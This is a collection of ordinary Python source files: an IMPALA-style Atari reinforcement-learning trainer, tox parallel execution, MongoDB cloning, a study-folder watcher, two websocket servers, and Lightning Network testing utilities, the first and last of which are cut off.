except Exception as e:
logging.error("Exception in worker process %i", actor_index)
traceback.print_exc()
print()
raise e
def get_batch(
flags,
free_queue: mp.SimpleQueue,
full_queue: mp.SimpleQueue,
buffers: Buffers,
initial_agent_state_buffers,
timings,
lock=threading.Lock(),
):
with lock:
timings.time("lock")
indices = [full_queue.get() for _ in range(flags.batch_size)]
timings.time("dequeue")
batch = {
key: torch.stack([buffers[key][m] for m in indices], dim=1) for key in buffers
}
initial_agent_state = (
torch.cat(ts, dim=1)
for ts in zip(*[initial_agent_state_buffers[m] for m in indices])
)
timings.time("batch")
for m in indices:
free_queue.put(m)
timings.time("enqueue")
batch = {k: t.to(device=flags.device, non_blocking=True) for k, t in batch.items()}
initial_agent_state = tuple(
t.to(device=flags.device, non_blocking=True) for t in initial_agent_state
)
timings.time("device")
return batch, initial_agent_state
def learn(
flags,
actor_model,
model,
batch,
initial_agent_state,
optimizer,
scheduler,
lock=threading.Lock(), # noqa: B008
):
"""Performs a learning (optimization) step."""
with lock:
learner_outputs, unused_state = model(batch, initial_agent_state)
# Take final value function slice for bootstrapping.
bootstrap_value = learner_outputs["baseline"][-1]
# Move from obs[t] -> action[t] to action[t] -> obs[t].
batch = {key: tensor[1:] for key, tensor in batch.items()}
learner_outputs = {key: tensor[:-1] for key, tensor in learner_outputs.items()}
rewards = batch["reward"]
if flags.reward_clipping == "abs_one":
clipped_rewards = torch.clamp(rewards, -1, 1)
elif flags.reward_clipping == "none":
clipped_rewards = rewards
discounts = (~batch["done"]).float() * flags.discounting
vtrace_returns = vtrace.from_logits(
behavior_policy_logits=batch["policy_logits"],
target_policy_logits=learner_outputs["policy_logits"],
actions=batch["action"],
discounts=discounts,
rewards=clipped_rewards,
values=learner_outputs["baseline"],
bootstrap_value=bootstrap_value,
)
pg_loss = compute_policy_gradient_loss(
learner_outputs["policy_logits"],
batch["action"],
vtrace_returns.pg_advantages,
)
baseline_loss = flags.baseline_cost * compute_baseline_loss(
vtrace_returns.vs - learner_outputs["baseline"]
)
entropy_loss = flags.entropy_cost * compute_entropy_loss(
learner_outputs["policy_logits"]
)
total_loss = pg_loss + baseline_loss + entropy_loss
episode_returns = batch["episode_return"][batch["done"]]
stats = {
"episode_returns": tuple(episode_returns.cpu().numpy()),
"mean_episode_return": torch.mean(episode_returns).item(),
"total_loss": total_loss.item(),
"pg_loss": pg_loss.item(),
"baseline_loss": baseline_loss.item(),
"entropy_loss": entropy_loss.item(),
}
optimizer.zero_grad()
total_loss.backward()
nn.utils.clip_grad_norm_(model.parameters(), flags.grad_norm_clipping)
optimizer.step()
scheduler.step()
actor_model.load_state_dict(model.state_dict())
return stats
def create_buffers(flags, obs_shape, num_actions) -> Buffers:
T = flags.unroll_length
specs = dict(
frame=dict(size=(T + 1, *obs_shape), dtype=torch.uint8),
reward=dict(size=(T + 1,), dtype=torch.float32),
done=dict(size=(T + 1,), dtype=torch.bool),
episode_return=dict(size=(T + 1,), dtype=torch.float32),
episode_step=dict(size=(T + 1,), dtype=torch.int32),
policy_logits=dict(size=(T + 1, num_actions), dtype=torch.float32),
baseline=dict(size=(T + 1,), dtype=torch.float32),
last_action=dict(size=(T + 1,), dtype=torch.int64),
action=dict(size=(T + 1,), dtype=torch.int64),
)
buffers: Buffers = {key: [] for key in specs}
for _ in range(flags.num_buffers):
for key in buffers:
buffers[key].append(torch.empty(**specs[key]).share_memory_())
return buffers
def train(flags): # pylint: disable=too-many-branches, too-many-statements
if flags.xpid is None:
flags.xpid = "torchbeast-%s" % time.strftime("%Y%m%d-%H%M%S")
plogger = file_writer.FileWriter(
xpid=flags.xpid, xp_args=flags.__dict__, rootdir=flags.savedir
)
checkpointpath = os.path.expandvars(
os.path.expanduser("%s/%s/%s" % (flags.savedir, flags.xpid, "model.tar"))
)
if flags.num_buffers is None: # Set sensible default for num_buffers.
flags.num_buffers = max(2 * flags.num_actors, flags.batch_size)
if flags.num_actors >= flags.num_buffers:
raise ValueError("num_buffers should be larger than num_actors")
if flags.num_buffers < flags.batch_size:
raise ValueError("num_buffers should be larger than batch_size")
T = flags.unroll_length
B = flags.batch_size
flags.device = None
if not flags.disable_cuda and torch.cuda.is_available():
logging.info("Using CUDA.")
flags.device = torch.device("cuda")
else:
logging.info("Not using CUDA.")
flags.device = torch.device("cpu")
env = create_env(flags)
model = Net(env.observation_space.shape, env.action_space.n, flags.use_lstm)
buffers = create_buffers(flags, env.observation_space.shape, model.num_actions)
# init sharing mode to allow model tensors to be shared across processes
model.share_memory() # model method
# Add initial RNN state.
initial_agent_state_buffers = []
for _ in range(flags.num_buffers):
state = model.initial_state(batch_size=1)
for t in state:
t.share_memory_() # tensor method
initial_agent_state_buffers.append(state)
# act arguments
ctx = mp.get_context("fork")
free_queue = ctx.SimpleQueue()
full_queue = ctx.SimpleQueue()
# setup actor processes
actor_processes = []
for i in range(flags.num_actors):
actor = ctx.Process(
target=act,
args=(
flags,
i,
free_queue,
full_queue,
model,
buffers,
initial_agent_state_buffers,
),
)
actor.start()
actor_processes.append(actor)
learner_model = Net(
env.observation_space.shape, env.action_space.n, flags.use_lstm
).to(device=flags.device)
optimizer = torch.optim.RMSprop(
learner_model.parameters(),
lr=flags.learning_rate,
momentum=flags.momentum,
eps=flags.epsilon,
alpha=flags.alpha,
)
def lr_lambda(epoch):
return 1 - min(epoch * T * B, flags.total_steps) / flags.total_steps
scheduler = torch.optim.lr_scheduler.LambdaLR(optimizer, lr_lambda)
logger = logging.getLogger("logfile")
stat_keys = [
"total_loss",
"mean_episode_return",
"pg_loss",
"baseline_loss",
"entropy_loss",
]
logger.info("# Step\t%s", "\t".join(stat_keys))
step, stats = 0, {}
def batch_and_learn(i, lock=threading.Lock()):
"""Thread target for the learning process."""
nonlocal step, stats
timings = prof.Timings()
while step < flags.total_steps:
timings.reset()
batch, agent_state = get_batch(
flags,
free_queue,
full_queue,
buffers,
initial_agent_state_buffers,
timings,
)
stats = learn(
flags, model, learner_model, batch, agent_state, optimizer, scheduler
)
timings.time("learn")
with lock:
to_log = dict(step=step)
to_log.update({k: stats[k] for k in stat_keys})
plogger.log(to_log)
step += T * B
if i == 0:
logging.info("Batch and learn: %s", timings.summary())
for m in range(flags.num_buffers):
free_queue.put(m)
threads = []
for i in range(flags.num_learner_threads):
thread = threading.Thread(
target=batch_and_learn, name="batch-and-learn-%d" % i, args=(i,)
)
thread.start()
threads.append(thread)
def checkpoint():
if flags.disable_checkpoint:
return
logging.info("Saving checkpoint to %s", checkpointpath)
torch.save(
{
"model_state_dict": model.state_dict(),
"optimizer_state_dict": optimizer.state_dict(),
"scheduler_state_dict": scheduler.state_dict(),
"flags": vars(flags),
},
checkpointpath,
)
timer = timeit.default_timer
try:
last_checkpoint_time = timer()
while step < flags.total_steps:
start_step = step
start_time = timer()
time.sleep(5)
if timer() - last_checkpoint_time > 10 * 60: # Save every 10 min.
checkpoint()
last_checkpoint_time = timer()
sps = (step - start_step) / (timer() - start_time)
if stats.get("episode_returns", None):
mean_return = (
"Return per episode: %.1f. " % stats["mean_episode_return"]
)
else:
mean_return = ""
total_loss = stats.get("total_loss", float("inf"))
logging.info(
"Steps %i @ %.1f SPS. Loss %f. %sStats:\n%s",
step,
sps,
total_loss,
mean_return,
pprint.pformat(stats),
)
except KeyboardInterrupt:
return # Try joining actors then quit.
else:
for thread in threads:
thread.join()
logging.info("Learning finished after %d steps.", step)
finally:
for _ in range(flags.num_actors):
free_queue.put(None)
for actor in actor_processes:
actor.join(timeout=1)
checkpoint()
plogger.close()
def test(flags, num_episodes: int = 10):
if flags.xpid is None:
checkpointpath = "./latest/model.tar"
else:
checkpointpath = os.path.expandvars(
os.path.expanduser("%s/%s/%s" % (flags.savedir, flags.xpid, "model.tar"))
)
gym_env = create_env(flags)
env = environment.Environment(gym_env)
model = Net(gym_env.observation_space.shape, gym_env.action_space.n, flags.use_lstm)
model.eval()
checkpoint = torch.load(checkpointpath, map_location="cpu")
model.load_state_dict(checkpoint["model_state_dict"])
observation = env.initial()
returns = []
while len(returns) < num_episodes:
if flags.mode == "test_render":
env.gym_env.render()
agent_outputs = model(observation)
policy_outputs, _ = agent_outputs
observation = env.step(policy_outputs["action"])
if observation["done"].item():
returns.append(observation["episode_return"].item())
logging.info(
"Episode ended after %d steps. Return: %.1f",
observation["episode_step"].item(),
observation["episode_return"].item(),
)
env.close()
logging.info(
"Average returns over %i steps: %.1f", num_episodes, sum(returns) / len(returns)
)
class AtariNet(nn.Module):
def __init__(self, observation_shape, num_actions, use_lstm=False):
super(AtariNet, self).__init__()
self.observation_shape = observation_shape
self.num_actions = num_actions
# Feature extraction.
self.conv1 = nn.Conv2d(
in_channels=self.observation_shape[0],
out_channels=32,
kernel_size=8,
stride=4,
)
self.conv2 = nn.Conv2d(32, 64, kernel_size=4, stride=2)
self.conv3 = nn.Conv2d(64, 64, kernel_size=3, stride=1)
# Fully connected layer.
self.fc = nn.Linear(3136, 512)
# FC output size + one-hot of last action + last reward.
core_output_size = self.fc.out_features + num_actions + 1
self.use_lstm = use_lstm
if use_lstm:
self.core = nn.LSTM(core_output_size, core_output_size, 2)
self.policy = nn.Linear(core_output_size, self.num_actions)
self.baseline = nn.Linear(core_output_size, 1)
def initial_state(self, batch_size):
if not self.use_lstm:
return tuple()
return tuple(
torch.zeros(self.core.num_layers, batch_size, self.core.hidden_size)
for _ in range(2)
)
def forward(self, inputs, core_state=()):
x = inputs["frame"] # [T, B, C, H, W].
T, B, *_ = x.shape
x = torch.flatten(x, 0, 1) # Merge time and batch.
x = x.float() / 255.0
x = F.relu(self.conv1(x))
x = F.relu(self.conv2(x))
x = F.relu(self.conv3(x))
x = x.view(T * B, -1)
x = F.relu(self.fc(x))
one_hot_last_action = F.one_hot(
inputs["last_action"].view(T * B), self.num_actions
).float()
clipped_reward = torch.clamp(inputs["reward"], -1, 1).view(T * B, 1)
core_input = torch.cat([x, clipped_reward, one_hot_last_action], dim=-1)
if self.use_lstm:
core_input = core_input.view(T, B, -1)
core_output_list = []
notdone = (~inputs["done"]).float()
for input, nd in zip(core_input.unbind(), notdone.unbind()):
# Reset core state to zero whenever an episode ended.
# Make `done` broadcastable with (num_layers, B, hidden_size)
# states:
nd = nd.view(1, -1, 1)
core_state = tuple(nd * s for s in core_state)
output, core_state = self.core(input.unsqueeze(0), core_state)
core_output_list.append(output)
core_output = torch.flatten(torch.cat(core_output_list), 0, 1)
else:
core_output = core_input
core_state = tuple()
policy_logits = self.policy(core_output)
baseline = self.baseline(core_output)
if self.training:
action = torch.multinomial(F.softmax(policy_logits, dim=1), num_samples=1)
else:
# Don't sample when testing.
action = torch.argmax(policy_logits, dim=1)
policy_logits = policy_logits.view(T, B, self.num_actions)
baseline = baseline.view(T, B)
action = action.view(T, B)
return (
dict(policy_logits=policy_logits, baseline=baseline, action=action),
core_state,
)
Net = AtariNet
def create_env(flags):
return atari_wrappers.wrap_pytorch(
atari_wrappers.wrap_deepmind(
atari_wrappers.make_atari(flags.env),
clip_rewards=False,
frame_stack=True,
scale=False,
)
)
def main(flags):
if flags.mode == "train":
train(flags)
else:
test(flags)
if __name__ == "__main__":
flags = parser.parse_args()
main(flags)
|
parallel.py
|
import os
import sys
from collections import OrderedDict, deque
from threading import Event, Semaphore, Thread
from tox import reporter
from tox.config.parallel import ENV_VAR_KEY as PARALLEL_ENV_VAR_KEY
from tox.exception import InvocationError
from tox.util.main import MAIN_FILE
from tox.util.spinner import Spinner
def run_parallel(config, venv_dict):
"""here we'll just start parallel sub-processes"""
live_out = config.option.parallel_live
args = [sys.executable, MAIN_FILE] + config.args
try:
position = args.index("--")
except ValueError:
position = len(args)
max_parallel = config.option.parallel
if max_parallel is None:
max_parallel = len(venv_dict)
semaphore = Semaphore(max_parallel)
finished = Event()
show_progress = not live_out and reporter.verbosity() > reporter.Verbosity.QUIET
with Spinner(enabled=show_progress) as spinner:
def run_in_thread(tox_env, os_env, processes):
output = None
env_name = tox_env.envconfig.envname
status = "skipped tests" if config.option.notest else None
try:
os_env[str(PARALLEL_ENV_VAR_KEY)] = str(env_name)
args_sub = list(args)
if hasattr(tox_env, "package"):
args_sub.insert(position, str(tox_env.package))
args_sub.insert(position, "--installpkg")
with tox_env.new_action("parallel {}".format(tox_env.name)) as action:
def collect_process(process):
processes[tox_env] = (action, process)
print_out = not live_out and tox_env.envconfig.parallel_show_output
output = action.popen(
args=args_sub,
env=os_env,
redirect=not live_out,
capture_err=live_out,
callback=collect_process,
returnout=print_out,
)
except InvocationError as err:
status = "parallel child exit code {}".format(err.exit_code)
finally:
semaphore.release()
finished.set()
tox_env.status = status
done.add(env_name)
outcome = spinner.succeed
if config.option.notest:
outcome = spinner.skip
elif status is not None:
outcome = spinner.fail
outcome(env_name)
if print_out and output is not None:
reporter.verbosity0(output)
threads = deque()
processes = {}
todo_keys = set(venv_dict.keys())
todo = OrderedDict((n, todo_keys & set(v.envconfig.depends)) for n, v in venv_dict.items())
done = set()
try:
while todo:
for name, depends in list(todo.items()):
if depends - done:
# skip if has unfinished dependencies
continue
del todo[name]
venv = venv_dict[name]
semaphore.acquire(blocking=True)
spinner.add(name)
thread = Thread(
target=run_in_thread, args=(venv, os.environ.copy(), processes)
)
thread.daemon = True
thread.start()
threads.append(thread)
if todo:
# wait until someone finishes and retry queuing jobs
finished.wait()
finished.clear()
while threads:
threads = [
thread for thread in threads if not thread.join(0.1) and thread.is_alive()
]
except KeyboardInterrupt:
reporter.verbosity0(
"[{}] KeyboardInterrupt parallel - stopping children".format(os.getpid())
)
while True:
# do not allow to interrupt until children interrupt
try:
# putting it inside a thread so it's not interrupted
stopper = Thread(target=_stop_child_processes, args=(processes, threads))
stopper.start()
stopper.join()
except KeyboardInterrupt:
continue
raise KeyboardInterrupt
def _stop_child_processes(processes, main_threads):
"""A three level stop mechanism for children - INT (250ms) -> TERM (100ms) -> KILL"""
# first stop children
def shutdown(tox_env, action, process):
action.handle_interrupt(process)
threads = [Thread(target=shutdown, args=(n, a, p)) for n, (a, p) in processes.items()]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
# then its threads
for thread in main_threads:
thread.join()
|
Core.py
|
from src.core.service.Mongo import Mongo
from src.core.service.Configuration import Configuration
from src.core.clone.Collection import Collection
from src.core.clone.BasicCollectionPart import BasicCollectionPart
from src.core.clone.OplogCollectionPart import OplogCollectionPart
import multiprocessing as mp
from queue import Empty as QueueEmpty
"""
Function (in another thread than the main program) to handle the clone of any CollectionPart
"""
def clone_collection_part(qi, qo, job_id, common_info):
# Create the history for a specific pharmacy
print('Process '+str(job_id)+': start to clone CollectionParts.')
Configuration.FILEPATH = common_info['configuration_filepath']
configuration = Configuration()
total = qi.qsize() # Only use that information for logging
while True:
try:
data = qi.get(timeout=1) # Timeout after 1 second, no need to wait more than that
if data == 'DONE':
print('Process ' + str(job_id) + ': job done, stop here this process.')
qo.put('DONE')
return
else:
if data['collection_part']['db'] == "local" and data['collection_part']['coll'] == 'oplog.rs':
print('Process ' + str(job_id) + ': Start long-running job to clone the oplog')
else:
print('Process '+str(job_id)+': Start CollectionParts ~'+str(total - qi.qsize())+'/'+str(total))
data['collection_part']['configuration'] = configuration
collection_part = Core.create_collection_part(inputs = data['collection_part'])
collection_part.sync()
except QueueEmpty:
qo.put('DONE')
return # Exit when all work is done
except:
raise # Raise all other errors
class Core:
def __init__(self, configuration):
self.configuration = configuration
self.primary = Mongo(configuration, is_primary=True)
self.secondary = Mongo(configuration, is_primary=False)
"""
In charge of launching the entire synchronisation of every database. Simple version without any multi-threading.
"""
def start(self):
print('Prepare sync of the following databases: '+str(', '.join(self.primary.list_databases())))
# Check all CollectionParts we need to create
oplog_input = None
other_inputs = []
for db in self.primary.list_databases():
for coll in self.primary.list_collections(db):
collection = Collection(configuration=self.configuration, db=db, coll=coll)
collection_part_inputs = collection.prepare_sync()
for inputs in collection_part_inputs:
# We need to reserve a long-running thread for the oplog. So, we want to put as the first element of the Queue
data = {'collection_part': inputs}
if db == "local" and coll == "oplog.rs":
oplog_input = data
else:
other_inputs.append(data)
if oplog_input is None:
raise ValueError("No oplog found...")
# Fill queues used for the multi-threading
qi = mp.Queue()
qo = mp.Queue()
qi.put(oplog_input)
for inputs in other_inputs:
qi.put(inputs)
# Starts the Jobs. We need at least 1 thread for the oplog, and another for the other collections
jobs = []
jobs_quantity = 1 + int(max(1,self.configuration.internal_threads()))
common_info = {'configuration_filepath': Configuration.FILEPATH}
for i in range(int(jobs_quantity)):
qi.put('DONE')
job = mp.Process(target=clone_collection_part, args=(qi, qo, i, common_info, ))
job.start()
jobs.append(job)
job_done = 0
while job_done < (jobs_quantity - 1): # There is one long-running thread which should never finish by itself.
try:
res = qo.get(timeout=3600*24)
if res == 'DONE':
job_done += 1
print('Remaining jobs: '+str(jobs_quantity - job_done - 1))
except QueueEmpty: # We cannot put a super-huge time out, so we simply handle the exception
pass
except:
raise # Raise all other errors
print('End synchronisation of every database, the oplog synchronisation will continue until you stop this script. Afterwards, just remove the database from the maintenance mode.')
"""
Create the appropriate CollectionPart instance
"""
@staticmethod
def create_collection_part(inputs):
if inputs['db'] == 'local' and inputs['coll'] == 'oplog.rs':
return OplogCollectionPart(**inputs)
else:
return BasicCollectionPart(**inputs)
|
watcher.py
|
import logging
import re
import threading
from html import escape
from pathlib import Path
from time import time, sleep
from typing import List
from filelock import FileLock # type: ignore
from antarest.core.config import Config
from antarest.core.utils.fastapi_sqlalchemy import db
from antarest.login.model import Group
from antarest.study.model import StudyFolder, DEFAULT_WORKSPACE_NAME
from antarest.study.service import StudyService
logger = logging.getLogger(__name__)
class Watcher:
"""
Files Watcher to listen raw studies changes and trigger a database update.
"""
LOCK = Path("watcher")
def __init__(self, config: Config, service: StudyService):
self.service = service
self.config = config
self.thread = (
threading.Thread(target=self._loop, daemon=True)
if not config.storage.watcher_lock
or Watcher._get_lock(config.storage.watcher_lock_delay)
else None
)
def start(self) -> None:
"""
Start watching
Returns:
"""
if self.thread:
self.thread.start()
@staticmethod
def _get_lock(lock_delay: int) -> bool:
"""
Force watcher to run only one by access a lock on filesystem.
Returns: true if watcher get the lock, false else.
"""
with FileLock(f"{Watcher.LOCK}.lock"):
start = (
int(f"0{Watcher.LOCK.read_text()}")
if Watcher.LOCK.exists()
else 0
)
now = int(time())
if now - start > lock_delay:
Watcher.LOCK.write_text(str(now))
logger.info("Watcher get lock")
return True
else:
logger.info("Watcher doesn't get lock")
return False
def _loop(self) -> None:
try:
logger.info(
"Removing duplicates, this is a temporary fix that should be removed when previous duplicates are removed"
)
with db():
self.service.remove_duplicates()
except Exception as e:
logger.error(
"Unexpected error when removing duplicates", exc_info=e
)
while True:
self._scan()
sleep(2)
def _scan(self) -> None:
"""
Scan recursively list of studies present on disk. Send updated list to study service.
Returns:
"""
def rec_scan(
path: Path,
workspace: str,
groups: List[Group],
filter_in: List[str],
filter_out: List[str],
) -> List[StudyFolder]:
try:
if (path / "AW_NO_SCAN").exists():
logger.info(
f"No scan directive file found. Will skip further scan of folder {path}"
)
return []
if (path / "study.antares").exists():
logger.debug(f"Study {path.name} found in {workspace}")
return [StudyFolder(path, workspace, groups)]
else:
folders: List[StudyFolder] = list()
if path.is_dir():
for child in path.iterdir():
try:
if (
child.is_dir()
and any(
[
re.search(regex, child.name)
for regex in filter_in
]
)
and not any(
[
re.search(regex, child.name)
for regex in filter_out
]
)
):
folders = folders + rec_scan(
child,
workspace,
groups,
filter_in,
filter_out,
)
except Exception as e:
logger.error(
f"Failed to scan dir {child}", exc_info=e
)
return folders
except Exception as e:
logger.error(f"Failed to scan dir {path}", exc_info=e)
return []
studies: List[StudyFolder] = list()
for name, workspace in self.config.storage.workspaces.items():
if name != DEFAULT_WORKSPACE_NAME:
path = Path(workspace.path)
groups = [
Group(id=escape(g), name=escape(g))
for g in workspace.groups
]
studies = studies + rec_scan(
path,
name,
groups,
workspace.filter_in,
workspace.filter_out,
)
with db():
self.service.sync_studies_on_disk(studies)
|
tcp.py
|
import logging
log = logging.getLogger(__name__)
import asyncio
from functools import partial
import json
from threading import Thread
import websockets
async def handle_connection(video, websocket):
# The response is a two-tuple of error, result. If error is not None,
# result should be discarded by client.
async for mesg in websocket:
try:
cmd, kwargs = json.loads(mesg)
result = video.dispatch(cmd, **kwargs)
payload = None, result
await websocket.send(json.dumps(payload))
except websockets.exceptions.ConnectionClosedOK:
pass
except Exception as e:
payload = str(e), None
await websocket.send(json.dumps(payload))
async def run_server(video, loop):
cb = partial(handle_connection, video)
async with websockets.serve(cb, video.hostname, video.port, loop=loop,
ping_interval=None):
while True:
await asyncio.sleep(0.1)
if video.stop.is_set():
break
def start_server(video, loop):
loop.run_until_complete(run_server(video, loop))
def video_tcp(video):
loop = asyncio.new_event_loop()
cb = partial(start_server, video, loop)
thread = Thread(target=cb)
thread.start()
print(f'Websocket server listening on ws://{video.hostname}:{video.port}')
thread.join()
print('Websocket server shutting down')
|
main.py
|
# https://github.com/palantir/python-jsonrpc-server/blob/develop/examples/langserver_ext.py
import json
import logging
import subprocess
import threading
from tornado import ioloop, process, web, websocket
from pyls_jsonrpc import streams
log = logging.getLogger(__name__)
class LanguageServerWebSocketHandler(websocket.WebSocketHandler):
"""Setup tornado websocket handler to host an external language server."""
writer = None
def open(self, *args, **kwargs):
log.info("Spawning pyls subprocess")
# Create an instance of the language server
proc = process.Subprocess(
['pyls', '-v'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE
)
# Create a writer that formats json messages with the correct LSP headers
self.writer = streams.JsonRpcStreamWriter(proc.stdin)
# Create a reader for consuming stdout of the language server. We need to
# consume this in another thread
def consume():
# Start a tornado IOLoop for reading/writing to the process in this thread
ioloop.IOLoop()
reader = streams.JsonRpcStreamReader(proc.stdout)
reader.listen(lambda msg: self.write_message(json.dumps(msg)))
thread = threading.Thread(target=consume)
thread.daemon = True
thread.start()
def on_message(self, message):
"""Forward client->server messages to the endpoint."""
self.writer.write(json.loads(message))
def check_origin(self, origin):
return True
if __name__ == "__main__":
app = web.Application([
(r"/python", LanguageServerWebSocketHandler),
])
app.listen(4000, address='127.0.0.1')
ioloop.IOLoop.current().start()
|
utils.py
|
from bitcoin.core import COIN # type: ignore
from bitcoin.rpc import RawProxy as BitcoinProxy # type: ignore
from bitcoin.rpc import JSONRPCError
from contextlib import contextmanager
from pathlib import Path
from pyln.client import RpcError
from pyln.testing.btcproxy import BitcoinRpcProxy
from collections import OrderedDict
from decimal import Decimal
from ephemeral_port_reserve import reserve # type: ignore
from pyln.client import LightningRpc
from pyln.client import Millisatoshi
import json
import logging
import lzma
import math
import os
import psutil # type: ignore
import random
import re
import shutil
import sqlite3
import string
import struct
import subprocess
import sys
import threading
import time
import warnings
BITCOIND_CONFIG = {
"regtest": 1,
"rpcuser": "rpcuser",
"rpcpassword": "rpcpass",
"fallbackfee": Decimal(1000) / COIN,
}
LIGHTNINGD_CONFIG = OrderedDict({
"log-level": "debug",
"cltv-delta": 6,
"cltv-final": 5,
"watchtime-blocks": 5,
"rescan": 1,
'disable-dns': None,
})
FUNDAMOUNT = 10**6
def env(name, default=None):
"""Access to environment variables
Allows access to environment variables, falling back to config.vars (part
of c-lightning's `./configure` output), and finally falling back to a
default value.
"""
fname = 'config.vars'
if os.path.exists(fname):
lines = open(fname, 'r').readlines()
config = dict([(line.rstrip().split('=', 1)) for line in lines])
else:
config = {}
if name in os.environ:
return os.environ[name]
elif name in config:
return config[name]
else:
return default
VALGRIND = env("VALGRIND") == "1"
TEST_NETWORK = env("TEST_NETWORK", 'regtest')
DEVELOPER = env("DEVELOPER", "0") == "1"
TEST_DEBUG = env("TEST_DEBUG", "0") == "1"
SLOW_MACHINE = env("SLOW_MACHINE", "0") == "1"
DEPRECATED_APIS = env("DEPRECATED_APIS", "0") == "1"
TIMEOUT = int(env("TIMEOUT", 180 if SLOW_MACHINE else 60))
EXPERIMENTAL_DUAL_FUND = env("EXPERIMENTAL_DUAL_FUND", "0") == "1"
def wait_for(success, timeout=TIMEOUT):
start_time = time.time()
interval = 0.25
while not success():
time_left = start_time + timeout - time.time()
if time_left <= 0:
raise ValueError("Timeout while waiting for {}", success)
time.sleep(min(interval, time_left))
interval *= 2
if interval > 5:
interval = 5
def write_config(filename, opts, regtest_opts=None, section_name='regtest'):
with open(filename, 'w') as f:
for k, v in opts.items():
f.write("{}={}\n".format(k, v))
if regtest_opts:
f.write("[{}]\n".format(section_name))
for k, v in regtest_opts.items():
f.write("{}={}\n".format(k, v))
def only_one(arr):
"""Many JSON RPC calls return an array; often we only expect a single entry
"""
assert len(arr) == 1
return arr[0]
def sync_blockheight(bitcoind, nodes):
height = bitcoind.rpc.getblockchaininfo()['blocks']
for n in nodes:
wait_for(lambda: n.rpc.getinfo()['blockheight'] == height)
def mine_funding_to_announce(bitcoind, nodes, num_blocks=5, wait_for_mempool=0):
"""Mine blocks so a channel can be announced (5, if it's already
mined), but make sure we don't leave nodes behind who will reject the
announcement. Not needed if there are only two nodes.
"""
bitcoind.generate_block(num_blocks - 1, wait_for_mempool)
sync_blockheight(bitcoind, nodes)
bitcoind.generate_block(1)
def wait_channel_quiescent(n1, n2):
wait_for(lambda: only_one(only_one(n1.rpc.listpeers(n2.info['id'])['peers'])['channels'])['htlcs'] == [])
wait_for(lambda: only_one(only_one(n2.rpc.listpeers(n1.info['id'])['peers'])['channels'])['htlcs'] == [])
def get_tx_p2wsh_outnum(bitcoind, tx, amount):
"""Get output number of this tx which is p2wsh of amount"""
decoded = bitcoind.rpc.decoderawtransaction(tx, True)
for out in decoded['vout']:
if out['scriptPubKey']['type'] == 'witness_v0_scripthash':
if out['value'] == Decimal(amount) / 10**8:
return out['n']
return None
class TailableProc(object):
"""A monitorable process that we can start, stop and tail.
This is the base class for the daemons. It allows us to directly
tail the processes and react to their output.
"""
def __init__(self, outputDir=None, verbose=True):
self.logs = []
self.logs_cond = threading.Condition(threading.RLock())
self.env = os.environ.copy()
self.running = False
self.proc = None
self.outputDir = outputDir
self.logsearch_start = 0
self.err_logs = []
self.prefix = ""
# Should we be logging lines we read from stdout?
self.verbose = verbose
# A filter function that'll tell us whether to filter out the line (not
# pass it to the log matcher and not print it to stdout).
self.log_filter = lambda line: False
def start(self, stdin=None, stdout=None, stderr=None):
"""Start the underlying process and start monitoring it.
"""
logging.debug("Starting '%s'", " ".join(self.cmd_line))
self.proc = subprocess.Popen(self.cmd_line,
stdin=stdin,
stdout=stdout if stdout else subprocess.PIPE,
stderr=stderr,
env=self.env)
self.thread = threading.Thread(target=self.tail)
self.thread.daemon = True
self.thread.start()
self.running = True
def save_log(self):
if self.outputDir:
logpath = os.path.join(self.outputDir, 'log')
with open(logpath, 'w') as f:
for l in self.logs:
f.write(l + '\n')
def stop(self, timeout=10):
self.save_log()
self.proc.terminate()
# Now give it some time to react to the signal
rc = self.proc.wait(timeout)
if rc is None:
self.proc.kill()
self.proc.wait()
self.thread.join()
return self.proc.returncode
def kill(self):
"""Kill process without giving it warning."""
self.proc.kill()
self.proc.wait()
self.thread.join()
def tail(self):
"""Tail the stdout of the process and remember it.
Stores the lines of output produced by the process in
self.logs and signals that a new line was read so that it can
be picked up by consumers.
"""
for line in iter(self.proc.stdout.readline, ''):
if len(line) == 0:
break
line = line.decode('UTF-8', 'replace').rstrip()
if self.log_filter(line):
continue
if self.verbose:
sys.stdout.write("{}: {}\n".format(self.prefix, line))
with self.logs_cond:
self.logs.append(line)
self.logs_cond.notifyAll()
self.running = False
self.proc.stdout.close()
if self.proc.stderr:
for line in iter(self.proc.stderr.readline, ''):
if line is None or len(line) == 0:
break
line = line.rstrip().decode('UTF-8', 'replace')
self.err_logs.append(line)
self.proc.stderr.close()
def is_in_log(self, regex, start=0):
"""Look for `regex` in the logs."""
ex = re.compile(regex)
for l in self.logs[start:]:
if ex.search(l):
logging.debug("Found '%s' in logs", regex)
return l
logging.debug("Did not find '%s' in logs", regex)
return None
def is_in_stderr(self, regex):
"""Look for `regex` in stderr."""
ex = re.compile(regex)
for l in self.err_logs:
if ex.search(l):
logging.debug("Found '%s' in stderr", regex)
return l
logging.debug("Did not find '%s' in stderr", regex)
return None
def wait_for_logs(self, regexs, timeout=TIMEOUT):
"""Look for `regexs` in the logs.
The logs contain tailed stdout of the process. We look for each regex
in `regexs`, starting from `logsearch_start` which normally is the
position of the last found entry of a previous wait-for logs call.
The ordering inside `regexs` doesn't matter.
We fail if the timeout is exceeded or if the underlying process
exits before all the `regexs` were found.
If timeout is None, no time-out is applied.
"""
logging.debug("Waiting for {} in the logs".format(regexs))
exs = [re.compile(r) for r in regexs]
start_time = time.time()
pos = self.logsearch_start
while True:
if timeout is not None and time.time() > start_time + timeout:
print("Time-out: can't find {} in logs".format(exs))
for r in exs:
if self.is_in_log(r):
print("({} was previously in logs!)".format(r))
raise TimeoutError('Unable to find "{}" in logs.'.format(exs))
with self.logs_cond:
if pos >= len(self.logs):
if not self.running:
raise ValueError('Process died while waiting for logs')
self.logs_cond.wait(1)
continue
for r in exs.copy():
self.logsearch_start = pos + 1
if r.search(self.logs[pos]):
logging.debug("Found '%s' in logs", r)
exs.remove(r)
break
if len(exs) == 0:
return self.logs[pos]
pos += 1
def wait_for_log(self, regex, timeout=TIMEOUT):
"""Look for `regex` in the logs.
Convenience wrapper for the common case of only seeking a single entry.
"""
return self.wait_for_logs([regex], timeout)
class SimpleBitcoinProxy:
"""Wrapper for BitcoinProxy to reconnect.
Long wait times between calls to the Bitcoin RPC could result in
`bitcoind` closing the connection, so here we just create
throwaway connections. This is easier than to reach into the RPC
library to close, reopen and reauth upon failure.
"""
def __init__(self, btc_conf_file, *args, **kwargs):
self.__btc_conf_file__ = btc_conf_file
def __getattr__(self, name):
if name.startswith('__') and name.endswith('__'):
# Python internal stuff
